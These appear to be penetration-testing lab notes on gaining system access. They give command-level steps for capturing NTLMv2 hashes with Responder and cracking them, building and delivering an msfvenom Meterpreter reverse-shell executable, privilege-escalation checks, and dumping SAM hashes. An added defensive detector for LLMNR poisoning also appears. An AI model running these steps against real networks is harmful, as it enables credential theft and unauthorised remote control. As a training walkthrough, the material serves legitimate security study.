1. Gain access to the system
1. Perform an Active Online Attack to Crack the System's Password using Responder

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are used to perform name resolution on the local link.
Responder is an LLMNR, NBT-NS and mDNS poisoner. By default the tool only responds to SMB.
Check the interfaces:
ifconfig
Now run Responder on the chosen interface:
sudo responder -I ens33
Now, when a user on the LAN tries to access a share that does not exist, Responder will capture the hash.


Logs are stored in the /usr/share/responder folder. We will have a hash there. Now crack it with John.
On Ubuntu you can install John as:
sudo snap install john-the-ripper
sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
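From the defender's side, the behaviour described above has a simple signature: a legitimate host only answers LLMNR/NBT-NS queries for its own name, whereas a poisoner answers for every name it sees, including names that do not exist. The following detector is an added example (not part of the original notes, and not Responder's code); it runs over constructed name-resolution records rather than captured traffic, and the IP addresses, names and the "CANARY-X9" canary name are all made up for the example.

```python
"""Flag LLMNR/NBT-NS poisoning from name-resolution event records."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class NameEvent:
    ts: float      # seconds since epoch
    kind: str      # "query" or "response"
    proto: str     # "LLMNR" or "NBT-NS"
    name: str      # name being queried / answered
    src: str       # source IP of the packet


# Constructed sample records, not a real capture. 10.10.10.5 is a genuine
# file server answering only its own name; 10.10.10.99 answers everything.
SAMPLE_EVENTS = [
    NameEvent(100.0, "query",    "LLMNR",  "FILESRV01", "10.10.10.20"),
    NameEvent(100.1, "response", "LLMNR",  "FILESRV01", "10.10.10.5"),
    NameEvent(105.0, "query",    "LLMNR",  "FILESVR01", "10.10.10.21"),  # user typo
    NameEvent(105.1, "response", "LLMNR",  "FILESVR01", "10.10.10.99"),  # answered anyway
    NameEvent(106.0, "query",    "NBT-NS", "PRINTER7",  "10.10.10.22"),
    NameEvent(106.1, "response", "NBT-NS", "PRINTER7",  "10.10.10.99"),
    NameEvent(107.0, "query",    "LLMNR",  "WPAD",      "10.10.10.23"),
    NameEvent(107.1, "response", "LLMNR",  "WPAD",      "10.10.10.99"),
    NameEvent(300.0, "query",    "LLMNR",  "CANARY-X9", "10.10.10.30"),  # canary lookup
    NameEvent(300.2, "response", "LLMNR",  "CANARY-X9", "10.10.10.99"),
]


def responders_by_name_count(events, threshold=3):
    """Return {src_ip: set_of_names} for hosts that answered at least
    `threshold` distinct names. Real hosts answer one or two names;
    a poisoner answers whatever is asked."""
    answered = defaultdict(set)
    for e in events:
        if e.kind == "response":
            answered[e.src].add(e.name.upper())
    return {ip: names for ip, names in answered.items() if len(names) >= threshold}


def canary_hits(events, canary_names):
    """Return sorted (responder_ip, name) pairs for answers to canary names.
    A canary is a name that no host owns, so any answer to it is poisoning
    regardless of how many other names the responder answered."""
    canary = {n.upper() for n in canary_names}
    return sorted({(e.src, e.name.upper()) for e in events
                   if e.kind == "response" and e.name.upper() in canary})


def suspected_poisoners(events, canary_names=("CANARY-X9",), threshold=3):
    """Union of both heuristics, as a sorted list of source IPs."""
    flagged = set(responders_by_name_count(events, threshold))
    flagged |= {ip for ip, _ in canary_hits(events, canary_names)}
    return sorted(flagged)


if __name__ == "__main__":
    for ip, names in responders_by_name_count(SAMPLE_EVENTS).items():
        print(f"{ip} answered {len(names)} distinct names: {sorted(names)}")
    for ip, name in canary_hits(SAMPLE_EVENTS, ["CANARY-X9"]):
        print(f"{ip} answered canary name {name}")
    print("suspected poisoners:", suspected_poisoners(SAMPLE_EVENTS))
```

The canary check is the more reliable of the two because it needs no threshold: schedule a periodic lookup of a name you know is not registered anywhere, and alert on any answer. The longer-term fix is to turn LLMNR off through Group Policy and disable NetBIOS over TCP/IP on the adapters, so that only DNS answers name queries.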
2. Audit system passwords using L0phtCrack
A Windows tool. If you know a single account, it can crack the other passwords on a remote machine over SMB. Use Password Auditing, via the Password Auditing Wizard.
3. Find Vulnerabilities on exploit sites
4. Gain Access to a Remote System using Reverse Shell Generator
Create the msfvenom payload:
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x64 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
Use Apache to transfer the file:
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
service apache2 start
Now run msfconsole:
msfconsole
use exploit/multi/handler
Set the payload type, port and IP, then visit the IP from the target to download the executable. Run it and you will get the shell.
You can run the following commands in Meterpreter:
sysinfo //get system information
Upload a file through Meterpreter. The PowerSploit privilege escalation script is at /usr/share/windows-resources/powersploit:
upload PowerUp.ps1 powerup.ps1
Now get a shell:
shell
Now execute the script:
powershell -ExecutionPolicy bypass -command ". .\powerup.ps1; Invoke-AllChecks"
Now exit it. To get a VNC session from Meterpreter, use the following command:
run vnc
5. Gain access to a system using Armitage
Armitage is a GUI front end for Metasploit.
service postgresql start
Now run Armitage from the Applications menu. Run an intense scan, and then we can create a payload according to our target.

Once the victim opens the payload, we get the session.
6. Gain access to a system using Ninja Jonin
Ninja is installed on the target and Jonin on the attacker machine.
We need to edit its config file to change the IP and port.

Open the Jonin listener; it will catch the sessions.
list //to list all sessions
connect 1 //to connect to session
//to get to cmd
change
cmd
help //displays help
7. Buffer Overflow
Tools required

8. System Password hacking
# To dump Windows SAM file hashes
pwdump7.exe > hashes.txt